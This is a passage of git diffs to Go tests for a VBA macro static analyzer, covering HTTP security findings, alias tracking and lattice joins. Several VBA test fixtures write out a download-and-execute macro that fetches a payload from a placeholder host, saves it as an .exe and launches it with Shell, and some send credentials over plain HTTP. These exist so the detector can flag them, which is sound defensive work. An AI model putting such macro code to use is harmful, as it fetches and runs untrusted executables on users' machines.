+	ir, err := procedureir.BuildParsed(procedureir.BuildOptions{RootDir: dir, Path: path, ModuleKind: "standard"}, doc)
+	if err != nil {
+		t.Fatal(err)
+	}
+	flow := vbacfg.BuildDocument(ir)
+	procedures := sourceProceduresFromIRRef(&ir, flow)
+	file := parsedFile{Path: path, Module: ir.ModuleName, ModuleKind: "standard", Source: []byte(source), Lines: normalizedSourceLines(source), IR: ir, CFG: flow, Procedures: procedures}
+	file.ModuleFacts = buildModuleAnalysisFacts(file.Lines, file.IR, file.Procedures)
+	for index := range file.Procedures {
+		file.Procedures[index].ModuleFacts = file.ModuleFacts
+	}
+	for _, proc := range file.Procedures {
+		if proc.Name == "Run" {
+			return file, proc
+		}
+	}
+	t.Fatal("Run procedure not found")
+	return parsedFile{}, sourceProcedure{}
+}
+
+func legacyHTTPFindings(analyzer Analyzer, file parsedFile, proc sourceProcedure) []Finding {
+	initial := newHTTPAnalysisState(file, mustProcedureIR(file.IR, proc))
+	states := map[vbacfg.BlockID]httpAnalysisState{proc.Graph.Entry: cloneHTTPState(initial)}
+	queue := []vbacfg.BlockID{proc.Graph.Entry}
+	queued := map[vbacfg.BlockID]bool{proc.Graph.Entry: true}
+	for len(queue) > 0 {
+		id := queue[0]
+		queue = queue[1:]
+		queued[id] = false
+		block, ok := proc.Graph.BlockByID(id)
+		if !ok {
+			continue
+		}
+		out := cloneHTTPState(states[id])
+		if block.Statement != nil && !block.Statement.Recovered {
+			out, _ = analyzer.transferHTTPStatement(file, proc, *block.Statement, out, false)
+		}
+		for _, edge := range proc.Graph.OutgoingEdges(id) {
+			candidate := out
+			if edge.Class == vbacfg.EdgeExceptional || edge.Uncertain {
+				candidate = states[id]
+			}
+			previous, initialized := states[edge.To]
+			merged, changed := joinHTTPState(previous, candidate, initialized)
+			if !changed {
+				continue
+			}
+			states[edge.To] = merged
+			if !queued[edge.To] {
+				queue = append(queue, edge.To)
+				queued[edge.To] = true
+			}
+		}
+	}
+	ids := append([]vbacfg.BlockID(nil), proc.Graph.Reachable(vbacfg.EdgeFilter{})...)
+	sort.Slice(ids, func(i, j int) bool { return ids[i] < ids[j] })
+	seen := map[string]bool{}
+	allSpecs := make([]httpFindingSpec, 0)
+	for _, id := range ids {
+		block, ok := proc.Graph.BlockByID(id)
+		if !ok || block.Statement == nil || block.Statement.Recovered {
+			continue
+		}
+		state, ok := states[id]
+		if !ok {
+			continue
+		}
+		_, specs := analyzer.transferHTTPStatement(file, proc, *block.Statement, state, true)
+		for _, spec := range specs {
+			key := fmt.Sprintf("%s|%d|%s|%s", spec.code, spec.line, spec.risk, spec.api)
+			if seen[key] {
+				continue
+			}
+			seen[key] = true
+			allSpecs = append(allSpecs, spec)
+		}
+	}
+	sort.SliceStable(allSpecs, func(i, j int) bool {
+		if allSpecs[i].line != allSpecs[j].line {
+			return allSpecs[i].line < allSpecs[j].line
+		}
+		return allSpecs[i].risk < allSpecs[j].risk
+	})
+	findings := make([]Finding, 0, len(allSpecs))
+	for _, spec := range allSpecs {
+		findings = append(findings, analyzer.httpFinding(file, proc, spec))
+	}
+	return findings
+}
+
+func mustProcedureIR(document procedureir.DocumentIR, proc sourceProcedure) procedureir.ProcedureIR {
+	for _, candidate := range document.Procedures {
+		if candidate.Symbol.Name == proc.Name {
+			return candidate
+		}
+	}
+	return procedureir.ProcedureIR{}
+}
+
+func sameStringSlice(left, right []string) bool {
+	if len(left) != len(right) {
+		return false
+	}
+	for index := range left {
+		if left[index] != right[index] {
+			return false
+		}
+	}
+	return true
+}

--- a/internal/analyze/http_transport_differential_test.go
+++ b/internal/analyze/http_transport_differential_test.go
@@ -5,6 +5,7 @@ import (
 	"fmt"
 	"os"
 	"path/filepath"
+	"reflect"
 	"sort"
 	"testing"
 
@@ -175,8 +176,8 @@ End Sub
 			if err != nil {
 				t.Fatal(err)
 			}
-			legacy := legacyHTTPFindings(analyzer, file, proc)
-			if got, want := httpFindingDigest(compact), httpFindingDigest(legacy); !sameStringSlice(got, want) {
+			legacy := legacyHTTPFindings(t, analyzer, file, proc)
+			if got, want := httpFindingDigest(compact), httpFindingDigest(legacy); !reflect.DeepEqual(got, want) {
 				t.Fatalf("compact/pre-migration digest differs:\n compact=%#v\n legacy=%#v", got, want)
 			}
 		})
@@ -217,8 +218,9 @@ func loadHTTPDifferentialProcedure(t *testing.T, dir, source string) (parsedFile
 	return parsedFile{}, sourceProcedure{}
 }
 
-func legacyHTTPFindings(analyzer Analyzer, file parsedFile, proc sourceProcedure) []Finding {
-	initial := newHTTPAnalysisState(file, mustProcedureIR(file.IR, proc))
+func legacyHTTPFindings(t *testing.T, analyzer Analyzer, file parsedFile, proc sourceProcedure) []Finding {
+	t.Helper()
+	initial := newHTTPAnalysisState(file, mustProcedureIR(t, file.IR, proc))
 	states := map[vbacfg.BlockID]httpAnalysisState{proc.Graph.Entry: cloneHTTPState(initial)}
 	queue := []vbacfg.BlockID{proc.Graph.Entry}
 	queued := map[vbacfg.BlockID]bool{proc.Graph.Entry: true}
@@ -287,23 +289,13 @@ func legacyHTTPFindings(analyzer Analyzer, file parsedFile, proc sourceProcedure
 	return findings
 }
 
-func mustProcedureIR(document procedureir.DocumentIR, proc sourceProcedure) procedureir.ProcedureIR {
+func mustProcedureIR(t *testing.T, document procedureir.DocumentIR, proc sourceProcedure) procedureir.ProcedureIR {
+	t.Helper()
 	for _, candidate := range document.Procedures {
 		if candidate.Symbol.Name == proc.Name {
 			return candidate
 		}
 	}
+	t.Fatalf("procedure IR not found: %s", proc.Name)
 	return procedureir.ProcedureIR{}
-}
-
-func sameStringSlice(left, right []string) bool {
-	if len(left) != len(right) {
-		return false
-	}
-	for index := range left {
-		if left[index] != right[index] {
-			return false
-		}
-	}
-	return true
 }

--- a/internal/analyze/http_transport_test.go
+++ b/internal/analyze/http_transport_test.go
@@ -2,7 +2,10 @@ package analyze
 
 import (
 	"encoding/json"
+	"fmt"
 	"path/filepath"
+	"reflect"
+	"sort"
 	"strconv"
 	"strings"
 	"testing"
@@ -860,4 +863,269 @@ End Sub
 	if len(got) != 1 || got[0].HTTPReliability == nil || got[0].HTTPReliability.TimeoutState != "missing" {
 		t.Fatalf("reassigned alias timeout findings = %+v", got)
 	}
+}
+
+func TestHTTPCompactSelfAssignmentPreservesObjectState(t *testing.T) {
+	t.Parallel()
+	dir := t.TempDir()
+	writeModule(t, dir, "Main.bas", `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run()
+    Dim request As Object
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    Set request = request
+    request.SetTimeouts 1000, 1000, 1000, 1000
+    request.Open "GET", "https://example.test", False
+    request.Send
+End Sub
+`)
+	findings, err := (Analyzer{RootDir: dir, Config: config.Default()}).Run()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if got := findingsByCode(findings, "VBA247"); len(got) != 0 {
+		t.Fatalf("self-assignment discarded timeout state: %+v", got)
+	}
+}
+
+func TestHTTPCompactPreservesBranchUnknownsAndAliasJoins(t *testing.T) {
+	t.Parallel()
+	dir := t.TempDir()
+	writeModule(t, dir, "Main.bas", `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run(ByVal configure As Boolean, ByVal useHTTP As Boolean)
+    Dim request As Object
+    Dim aliasRequest As Object
+    Dim target As String
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    Set aliasRequest = request
+    If configure Then
+        aliasRequest.SetTimeouts 1000, 1000, 1000, 1000
+    End If
+    If useHTTP Then
+        target = "http://api.example.test"
+    Else
+        target = "https://api.example.test"
+    End If
+    request.Open "GET", target, False
+    request.SetCredentials "user", "password", 0
+    request.Send
+End Sub
+`)
+	findings, err := (Analyzer{RootDir: dir, Config: config.Default()}).Run()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if got := findingsByCode(findings, "VBA246"); len(got) != 0 {
+		for _, finding := range got {
+			if finding.HTTPSecurity != nil && finding.HTTPSecurity.RiskKind == "plain_http_credentials" {
+				t.Fatalf("conflicting URL branches became a plain HTTP finding: %+v", finding)
+			}
+		}
+	}
+	got := findingsByCode(findings, "VBA247")
+	if len(got) != 1 || got[0].HTTPReliability == nil || got[0].HTTPReliability.TimeoutState != "missing" {
+		t.Fatalf("branch timeout join findings = %+v", got)
+	}
+}
+
+func TestHTTPCompactLoopAliasStateDoesNotDuplicateFindings(t *testing.T) {
+	t.Parallel()
+	dir := t.TempDir()
+	writeModule(t, dir, "Main.bas", `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run()
+    Dim request As Object
+    Dim aliasRequest As Object
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    Set aliasRequest = request
+    For i = 1 To 2
+        aliasRequest.SetTimeouts 1000, 1000, 1000, 1000
+    Next i
+    request.Open "GET", "https://example.test", False
+    request.Send
+End Sub
+`)
+	findings, err := (Analyzer{RootDir: dir, Config: config.Default()}).Run()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if got := findingsByCode(findings, "VBA247"); len(got) != 0 {
+		t.Fatalf("finite timeout through loop alias produced findings: %+v", got)
+	}
+}
+
+func TestHTTPCompactSaveEvidencePropagatesToStreamAliases(t *testing.T) {
+	t.Parallel()
+	dir := t.TempDir()
+	writeModule(t, dir, "Main.bas", `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run()
+    Dim request As Object
+    Dim stream As ADODB.Stream
+    Dim aliasStream As ADODB.Stream
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    request.Open "GET", "https://example.test/payload", False
+    request.Send
+    Set stream = New ADODB.Stream
+    Set aliasStream = stream
+    aliasStream.Write request.ResponseBody
+    aliasStream.SaveToFile "C:\Temp\payload.exe", 2
+    Shell "C:\Temp\payload.exe"
+End Sub
+`)
+	findings, err := (Analyzer{RootDir: dir, Config: config.Default()}).Run()
+	if err != nil {
+		t.Fatal(err)
+	}
+	for _, finding := range findingsByCode(findings, "VBA246") {
+		if finding.HTTPSecurity != nil && finding.HTTPSecurity.RiskKind == "download_and_execute" {
+			return
+		}
+	}
+	t.Fatalf("alias SaveToFile did not produce download_and_execute: %+v", findings)
+}
+
+func TestHTTPCompactSkipsUnreachableStatements(t *testing.T) {
+	t.Parallel()
+	dir := t.TempDir()
+	writeModule(t, dir, "Main.bas", `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run()
+    Dim request As Object
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    Exit Sub
+    Debug.Print "Bearer unreachable-token"
+    request.Open "GET", "http://user:password@example.test", False
+    request.Send
+End Sub
+`)
+	findings, err := (Analyzer{RootDir: dir, Config: config.Default()}).Run()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if got := findingsByCode(findings, "VBA246"); len(got) != 0 {
+		t.Fatalf("unreachable HTTP statement produced findings: %+v", got)
+	}
+}
+
+func TestHTTPCompactIntersectsSavedPathsAcrossDifferentSites(t *testing.T) {
+	t.Parallel()
+	dir := t.TempDir()
+	writeModule(t, dir, "Main.bas", `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run(ByVal chooseFirst As Boolean)
+	Dim request As Object
+	Dim stream As ADODB.Stream
+	Dim savePath As String
+	Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+	request.Open "GET", "https://example.test/payload", False
+	request.Send
+	Set stream = New ADODB.Stream
+	stream.Write request.ResponseBody
+	savePath = "C:\Temp\same.exe"
+	If chooseFirst Then
+		stream . SaveToFile savePath, 2
+	Else
+		stream . SaveToFile savePath, 2
+	End If
+	Shell savePath
+End Sub
+`)
+	findings, err := (Analyzer{RootDir: dir, Config: config.Default()}).Run()
+	if err != nil {
+		t.Fatal(err)
+	}
+	for _, finding := range findingsByCode(findings, "VBA246") {
+		if finding.HTTPSecurity != nil && finding.HTTPSecurity.RiskKind == "download_and_execute" {
+			return
+		}
+	}
+	t.Fatalf("same path at different SaveToFile sites was lost: %+v", findings)
+}
+
+func TestHTTPCompactUncertainIdentityPreservesVBA224Ownership(t *testing.T) {
+	t.Parallel()
+	dir := t.TempDir()
+	writeModule(t, dir, "Main.bas", `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run(ByVal chooseClient As Boolean)
+    Dim request As Object
+    If chooseClient Then
+        Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    Else
+        Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    End If
+    request.SetTimeouts 1000, 1000, 1000, 1000
+    request.Open "GET", "http://example.test", False
+    request.SetRequestHeader "Authorization", InputBox("Token")
+    request.Send
+End Sub
+`)
+	findings, err := (Analyzer{RootDir: dir, Config: config.Default()}).Run()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if got := findingsByCode(findings, "VBA246"); len(got) == 0 {
+		t.Fatalf("missing specialized uncertain-identity finding: %+v", findings)
+	}
+	if got := findingsByCode(findings, "VBA224"); len(got) != 0 {
+		t.Fatalf("VBA224 was not suppressed by uncertain-identity sink ownership: %+v", got)
+	}
+}
+
+func TestHTTPCompactBatchAndRealtimeOrderingMatch(t *testing.T) {
+	t.Parallel()
+	dir := t.TempDir()
+	source := `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run()
+    Dim request As Object
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    request.Open "GET", "http://example.test", False, "user", "password"
+    request.Send
+End Sub
+`
+	writeModule(t, dir, "Main.bas", source)
+	cfg := config.Default()
+	batch, err := (Analyzer{RootDir: dir, Config: cfg}).Run()
+	if err != nil {
+		t.Fatal(err)
+	}
+	realtime, err := runRealtimeForSingleModule(t, dir, cfg, "Main.bas")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if got, want := httpFindingDigest(batch), httpFindingDigest(realtime); !reflect.DeepEqual(got, want) {
+		t.Fatalf("batch/realtime HTTP digest differs:\n batch=%#v\n realtime=%#v", got, want)
+	}
+}
+
+func httpFindingDigest(findings []Finding) []string {
+	digest := make([]string, 0, len(findings))
+	for _, finding := range findings {
+		api, risk, header, origin, timeout := "", "", "", "", ""
+		if finding.HTTPSecurity != nil {
+			api, risk, header, origin = finding.HTTPSecurity.API, finding.HTTPSecurity.RiskKind, finding.HTTPSecurity.Header, finding.HTTPSecurity.Origin
+		}
+		if finding.HTTPReliability != nil {
+			api, risk, timeout = finding.HTTPReliability.API, finding.HTTPReliability.RiskKind, finding.HTTPReliability.TimeoutState
+		}
+		owned := make([]int, 0, len(finding.httpOwnedSinks))
+		for sink, present := range finding.httpOwnedSinks {
+			if present {
+				owned = append(owned, sink)
+			}
+		}
+		sort.Ints(owned)
+		ownedDigest := make([]string, 0, len(owned))
+		for _, sink := range owned {
+			ownedDigest = append(ownedDigest, strconv.Itoa(sink))
+		}
+		// Keep the differential oracle sensitive to the public diagnostic
+		// contract: order/multiplicity, range, severity, redacted witness
+		// projection, and HTTP context fields all participate in the digest.
+		digest = append(digest, fmt.Sprintf("%s|%s|%s|%s|%d|%d|%d|%d|%s|%s|%s|%s|%s|%s|%s", finding.Code, finding.Severity, finding.File, finding.Procedure, finding.Line, finding.Column, finding.EndLine, finding.EndColumn, api, risk, header, origin, timeout, strings.Join(finding.NearbyCode, "\x1f"), strings.Join(ownedDigest, ",")))
+	}
+	return digest
 }

--- a/internal/analyze/http_transport_test.go
+++ b/internal/analyze/http_transport_test.go
@@ -2,7 +2,6 @@ package analyze
 
 import (
 	"encoding/json"
-	"fmt"
 	"path/filepath"
 	"reflect"
 	"sort"
@@ -882,6 +881,9 @@ func TestHTTPCompactProcessLaunchRequiresKnownReceiver(t *testing.T) {
 	if !httpCompactIsProcessLaunch(`known.Run "payload.exe"`, state.View(), env) {
 		t.Fatal("known launcher receiver was not recognized")
 	}
+	if !httpCompactIsProcessLaunch(`Set result = known.Run "payload.exe"`, state.View(), env) {
+		t.Fatal("assignment-form launcher receiver was not recognized")
+	}
 	if httpCompactIsProcessLaunch(`Set result = other.Run "payload.exe"`, state.View(), env) {
 		t.Fatal("unknown launcher receiver reused an unrelated slot")
 	}
@@ -1123,16 +1125,41 @@ End Sub
 	}
 }
 
-func httpFindingDigest(findings []Finding) []string {
-	digest := make([]string, 0, len(findings))
+type httpFindingDigestEntry struct {
+	Code         string
+	Severity     string
+	File         string
+	Module       string
+	Procedure    string
+	Line         int
+	Column       int
+	EndLine      int
+	EndColumn    int
+	ScopeEndLine int
+	Message      string
+	Reason       string
+	Suggestion   string
+	NearbyCode   []string
+	CallCycle    *CallCycleContext
+	DataFlow     *DataFlowContext
+
+	CommandExecution *CommandExecutionContext
+	SQLExecution     *SQLExecutionContext
+	FileOperation    *FileOperationContext
+	HTTPSecurity     *HTTPSecurityContext
+	HTTPReliability  *HTTPReliabilityContext
+	OpaqueBoolean    *OpaqueBooleanContext
+	RuntimeError     *RuntimeErrorContext
+
+	// httpOwnedSinks is private metadata used by HTTP's VBA224 suppression;
+	// include its canonicalized projection so ownership differences remain
+	// visible without comparing map iteration order.
+	OwnedSinks []int
+}
+
+func httpFindingDigest(findings []Finding) []httpFindingDigestEntry {
+	digest := make([]httpFindingDigestEntry, 0, len(findings))
 	for _, finding := range findings {
-		api, risk, header, origin, timeout := "", "", "", "", ""
-		if finding.HTTPSecurity != nil {
-			api, risk, header, origin = finding.HTTPSecurity.API, finding.HTTPSecurity.RiskKind, finding.HTTPSecurity.Header, finding.HTTPSecurity.Origin
-		}
-		if finding.HTTPReliability != nil {
-			api, risk, timeout = finding.HTTPReliability.API, finding.HTTPReliability.RiskKind, finding.HTTPReliability.TimeoutState
-		}
 		owned := make([]int, 0, len(finding.httpOwnedSinks))
 		for sink, present := range finding.httpOwnedSinks {
 			if present {
@@ -1140,14 +1167,32 @@ func httpFindingDigest(findings []Finding) []string {
 			}
 		}
 		sort.Ints(owned)
-		ownedDigest := make([]string, 0, len(owned))
-		for _, sink := range owned {
-			ownedDigest = append(ownedDigest, strconv.Itoa(sink))
-		}
-		// Keep the differential oracle sensitive to the public diagnostic
-		// contract: order/multiplicity, range, severity, redacted witness
-		// projection, and HTTP context fields all participate in the digest.
-		digest = append(digest, fmt.Sprintf("%s|%s|%s|%s|%d|%d|%d|%d|%s|%s|%s|%s|%s|%s|%s", finding.Code, finding.Severity, finding.File, finding.Procedure, finding.Line, finding.Column, finding.EndLine, finding.EndColumn, api, risk, header, origin, timeout, strings.Join(finding.NearbyCode, "\x1f"), strings.Join(ownedDigest, ",")))
+		digest = append(digest, httpFindingDigestEntry{
+			Code:             finding.Code,
+			Severity:         finding.Severity,
+			File:             finding.File,
+			Module:           finding.Module,
+			Procedure:        finding.Procedure,
+			Line:             finding.Line,
+			Column:           finding.Column,
+			EndLine:          finding.EndLine,
+			EndColumn:        finding.EndColumn,
+			ScopeEndLine:     finding.ScopeEndLine,
+			Message:          finding.Message,
+			Reason:           finding.Reason,
+			Suggestion:       finding.Suggestion,
+			NearbyCode:       finding.NearbyCode,
+			CallCycle:        finding.CallCycle,
+			DataFlow:         finding.DataFlow,
+			CommandExecution: finding.CommandExecution,
+			SQLExecution:     finding.SQLExecution,
+			FileOperation:    finding.FileOperation,
+			HTTPSecurity:     finding.HTTPSecurity,
+			HTTPReliability:  finding.HTTPReliability,
+			OpaqueBoolean:    finding.OpaqueBoolean,
+			RuntimeError:     finding.RuntimeError,
+			OwnedSinks:       owned,
+		})
 	}
 	return digest
 }

--- a/internal/analyze/http_transport_test.go
+++ b/internal/analyze/http_transport_test.go
@@ -893,26 +893,34 @@ func TestHTTPCompactProcessLaunchRequiresKnownReceiver(t *testing.T) {
 	}
 }
 
-func TestHTTPCompactStringCandidatesRetainsAllCombinations(t *testing.T) {
+func TestHTTPCompactStringCandidatesBoundsCartesianProduct(t *testing.T) {
 	values := map[string]map[string]bool{"prefix": {}, "suffix": {}}
 	for index := 0; index < 9; index++ {
 		values["prefix"]["C:\\Temp\\payload"+strconv.Itoa(index)+"-"] = true
 		values["suffix"][strconv.Itoa(index)+".exe"] = true
 	}
 	candidates := httpCompactStringCandidates("prefix & suffix", values)
-	if len(candidates) != 81 {
-		t.Fatalf("candidate count = %d, want 81", len(candidates))
+	if len(candidates) != 64 {
+		t.Fatalf("candidate count = %d, want bounded 64", len(candidates))
 	}
-	seen := make(map[string]bool, len(candidates))
 	for _, candidate := range candidates {
-		seen[candidate] = true
+		if candidate == "" {
+			t.Fatal("bounded candidate set contains an empty path")
+		}
 	}
+
+	encoded := ""
 	for prefix := range values["prefix"] {
 		for suffix := range values["suffix"] {
-			if !seen[prefix+suffix] {
-				t.Fatalf("candidate %q was dropped", prefix+suffix)
-			}
+			encoded = httpCompactSavedPathSetAdd(encoded, prefix+suffix)
 		}
+	}
+	paths := strings.Split(encoded, httpSavedPathSetSeparator)
+	if len(paths) != 81 {
+		t.Fatalf("saved-path fallback count = %d, want 81", len(paths))
+	}
+	if !httpCompactSavedPathSetMatches(encoded, httpPathKey("C:\\Temp\\payload8-8.exe")) {
+		t.Fatal("saved-path fallback dropped an overflow candidate")
 	}
 }
 
@@ -1102,15 +1110,18 @@ func TestHTTPCompactUncertainIdentityPreservesVBA224Ownership(t *testing.T) {
 Option Explicit
 Public Sub Run(ByVal chooseClient As Boolean)
     Dim request As Object
+    Dim aliasRequest As Object
     If chooseClient Then
         Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
     Else
         Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
     End If
+    Set aliasRequest = request
     request.SetTimeouts 1000, 1000, 1000, 1000
     request.Open "GET", "http://example.test", False
     request.SetRequestHeader "Authorization", InputBox("Token")
     request.Send
+    aliasRequest.Send
 End Sub
 `)
 	findings, err := (Analyzer{RootDir: dir, Config: config.Default()}).Run()

--- a/internal/analyze/http_transport_test.go
+++ b/internal/analyze/http_transport_test.go
@@ -10,6 +10,7 @@ import (
 	"strings"
 	"testing"
 
+	"github.com/harumiWeb/xlflow/internal/analyze/semanticstate"
 	"github.com/harumiWeb/xlflow/internal/config"
 )
 
@@ -862,6 +863,27 @@ End Sub
 	got := findingsByCode(findings, "VBA247")
 	if len(got) != 1 || got[0].HTTPReliability == nil || got[0].HTTPReliability.TimeoutState != "missing" {
 		t.Fatalf("reassigned alias timeout findings = %+v", got)
+	}
+}
+
+func TestHTTPCompactProcessLaunchRequiresKnownReceiver(t *testing.T) {
+	environment := semanticstate.NewEnvironment([]string{"launcher:known"})
+	launcherID, ok := environment.Symbol("launcher:known")
+	if !ok {
+		t.Fatal("launcher slot was not indexed")
+	}
+	state := semanticstate.NewState[httpScalar](environment.Layout())
+	state.Set(launcherID, httpScalar{class: httpCompactLauncherSlot, present: true, text: "wscript.shell"})
+	env := &httpCompactEnvironment{
+		launchers: map[string]httpCompactSlot{
+			"known": {id: launcherID, class: httpCompactLauncherSlot},
+		},
+	}
+	if !httpCompactIsProcessLaunch(`known.Run "payload.exe"`, state.View(), env) {
+		t.Fatal("known launcher receiver was not recognized")
+	}
+	if httpCompactIsProcessLaunch(`Set result = other.Run "payload.exe"`, state.View(), env) {
+		t.Fatal("unknown launcher receiver reused an unrelated slot")
 	}
 }
 

--- a/internal/analyze/http_transport_test.go
+++ b/internal/analyze/http_transport_test.go
@@ -876,6 +876,7 @@ func TestHTTPCompactProcessLaunchRequiresKnownReceiver(t *testing.T) {
 	env := &httpCompactEnvironment{
 		launchers: map[string]httpCompactSlot{
 			"known": {id: launcherID, class: httpCompactLauncherSlot},
+			"shell": {id: launcherID, class: httpCompactLauncherSlot},
 		},
 	}
 	if !httpCompactIsProcessLaunch(`known.Run "payload.exe"`, state.View(), env) {
@@ -886,6 +887,32 @@ func TestHTTPCompactProcessLaunchRequiresKnownReceiver(t *testing.T) {
 	}
 	if httpCompactIsProcessLaunch(`Set result = other.Run "payload.exe"`, state.View(), env) {
 		t.Fatal("unknown launcher receiver reused an unrelated slot")
+	}
+	if httpCompactIsProcessLaunch(`wrapper.shell.Run "payload.exe"`, state.View(), env) {
+		t.Fatal("qualified member receiver was treated as the tracked launcher")
+	}
+}
+
+func TestHTTPCompactStringCandidatesRetainsAllCombinations(t *testing.T) {
+	values := map[string]map[string]bool{"prefix": {}, "suffix": {}}
+	for index := 0; index < 9; index++ {
+		values["prefix"]["C:\\Temp\\payload"+strconv.Itoa(index)+"-"] = true
+		values["suffix"][strconv.Itoa(index)+".exe"] = true
+	}
+	candidates := httpCompactStringCandidates("prefix & suffix", values)
+	if len(candidates) != 81 {
+		t.Fatalf("candidate count = %d, want 81", len(candidates))
+	}
+	seen := make(map[string]bool, len(candidates))
+	for _, candidate := range candidates {
+		seen[candidate] = true
+	}
+	for prefix := range values["prefix"] {
+		for suffix := range values["suffix"] {
+			if !seen[prefix+suffix] {
+				t.Fatalf("candidate %q was dropped", prefix+suffix)
+			}
+		}
 	}
 }
 

--- a/internal/analyze/semanticstate/semanticstate_test.go
+++ b/internal/analyze/semanticstate/semanticstate_test.go
@@ -20,6 +20,56 @@ func (maxLattice) Join(dst *int, src int) bool {
 	return true
 }
 
+// taggedScalar models the shape used by compact semantic domains: absence is
+// represented by a present slot carrying scalarAbsent, while an unknown fact
+// is an explicit scalar value. Keeping both states in the test makes it
+// impossible for a future State/JoinFrom change to conflate a missing slot
+// with a propagated unknown.
+type scalarTag uint8
+
+const (
+	scalarAbsent scalarTag = iota
+	scalarUnknown
+	scalarKnown
+)
+
+type taggedScalar struct {
+	tag   scalarTag
+	value string
+}
+
+type taggedScalarLattice struct{}
+
+func (taggedScalarLattice) Clone(value taggedScalar) taggedScalar { return value }
+
+func (taggedScalarLattice) Join(dst *taggedScalar, src taggedScalar) bool {
+	if dst == nil {
+		return false
+	}
+	merged := *dst
+	switch {
+	case dst.tag == scalarUnknown || src.tag == scalarUnknown:
+		merged = taggedScalar{tag: scalarUnknown}
+	case dst.tag == scalarAbsent:
+		merged = src
+	case src.tag == scalarAbsent:
+		// Absence is the lattice bottom for this slot and must not erase a
+		// fact learned on another path.
+	case dst.tag == scalarKnown && src.tag == scalarKnown:
+		if dst.value == src.value {
+			return false
+		}
+		merged = taggedScalar{tag: scalarUnknown}
+	default:
+		merged = src
+	}
+	if merged == *dst {
+		return false
+	}
+	*dst = merged
+	return true
+}
+
 func testGraph() cfg.Graph {
 	return cfg.Graph{
 		Blocks: []cfg.Block{
@@ -86,6 +136,102 @@ func TestStateJoinReportsOnlyChangedSlotsAndIsIdempotent(t *testing.T) {
 	}
 }
 
+func TestStatePreservesExplicitAbsenceAndUnknownScalarFacts(t *testing.T) {
+	env := NewEnvironment([]string{"object", "url"})
+	object, _ := env.Symbol("object")
+	url, _ := env.Symbol("url")
+	state := NewState[taggedScalar](env.Layout())
+	if !state.Set(object, taggedScalar{tag: scalarAbsent}) {
+		t.Fatal("failed to store explicit absence")
+	}
+	if !state.Set(url, taggedScalar{tag: scalarUnknown}) {
+		t.Fatal("failed to store explicit unknown")
+	}
+	if !state.View().Has(object) || !state.View().Has(url) {
+		t.Fatal("explicit scalar facts must remain present slots")
+	}
+	if got, ok := state.View().Value(object); !ok || got.tag != scalarAbsent {
+		t.Fatalf("absence fact = %#v, %v", got, ok)
+	}
+	if got, ok := state.View().Value(url); !ok || got.tag != scalarUnknown {
+		t.Fatalf("unknown fact = %#v, %v", got, ok)
+	}
+	if got := state.View().IDs(); !reflect.DeepEqual(got, []SymbolID{object, url}) {
+		t.Fatalf("scalar fact IDs = %#v, want object/url order", got)
+	}
+
+	clone := NewState[taggedScalar](env.Layout())
+	clone.CloneFrom(state.View(), taggedScalarLattice{}.Clone)
+	if got, ok := clone.View().Value(object); !ok || got.tag != scalarAbsent {
+		t.Fatalf("cloned absence fact = %#v, %v", got, ok)
+	}
+	if got, ok := clone.View().Value(url); !ok || got.tag != scalarUnknown {
+		t.Fatalf("cloned unknown fact = %#v, %v", got, ok)
+	}
+}
+
+func TestTaggedScalarJoinReportsChangedSlotsAndIsIdempotent(t *testing.T) {
+	env := NewEnvironment([]string{"object", "url", "credential"})
+	object, _ := env.Symbol("object")
+	url, _ := env.Symbol("url")
+	credential, _ := env.Symbol("credential")
+	lattice := taggedScalarLattice{}
+
+	tests := []struct {
+		name       string
+		left       taggedScalar
+		right      taggedScalar
+		want       taggedScalar
+		wantChange bool
+	}{
+		{name: "absence learns known", left: taggedScalar{tag: scalarAbsent}, right: taggedScalar{tag: scalarKnown, value: "url"}, want: taggedScalar{tag: scalarKnown, value: "url"}, wantChange: true},
+		{name: "known ignores absence", left: taggedScalar{tag: scalarKnown, value: "url"}, right: taggedScalar{tag: scalarAbsent}, want: taggedScalar{tag: scalarKnown, value: "url"}},
+		{name: "equal known is stable", left: taggedScalar{tag: scalarKnown, value: "url"}, right: taggedScalar{tag: scalarKnown, value: "url"}, want: taggedScalar{tag: scalarKnown, value: "url"}},
+		{name: "conflicting known becomes unknown", left: taggedScalar{tag: scalarKnown, value: "url"}, right: taggedScalar{tag: scalarKnown, value: "other"}, want: taggedScalar{tag: scalarUnknown}, wantChange: true},
+		{name: "unknown absorbs known", left: taggedScalar{tag: scalarKnown, value: "url"}, right: taggedScalar{tag: scalarUnknown}, want: taggedScalar{tag: scalarUnknown}, wantChange: true},
+	}
+	for _, test := range tests {
+		t.Run(test.name, func(t *testing.T) {
+			left := NewState[taggedScalar](env.Layout())
+			right := NewState[taggedScalar](env.Layout())
+			left.Set(url, test.left)
+			right.Set(url, test.right)
+			changed := make([]SymbolID, 0, 1)
+			if got := left.JoinFrom(right.View(), lattice, &changed); got != test.wantChange {
+				t.Fatalf("JoinFrom changed = %v, want %v (IDs %#v)", got, test.wantChange, changed)
+			}
+			if got, ok := left.View().Value(url); !ok || got != test.want {
+				t.Fatalf("joined scalar = %#v, %v; want %#v", got, ok, test.want)
+			}
+			if test.wantChange && !reflect.DeepEqual(changed, []SymbolID{url}) {
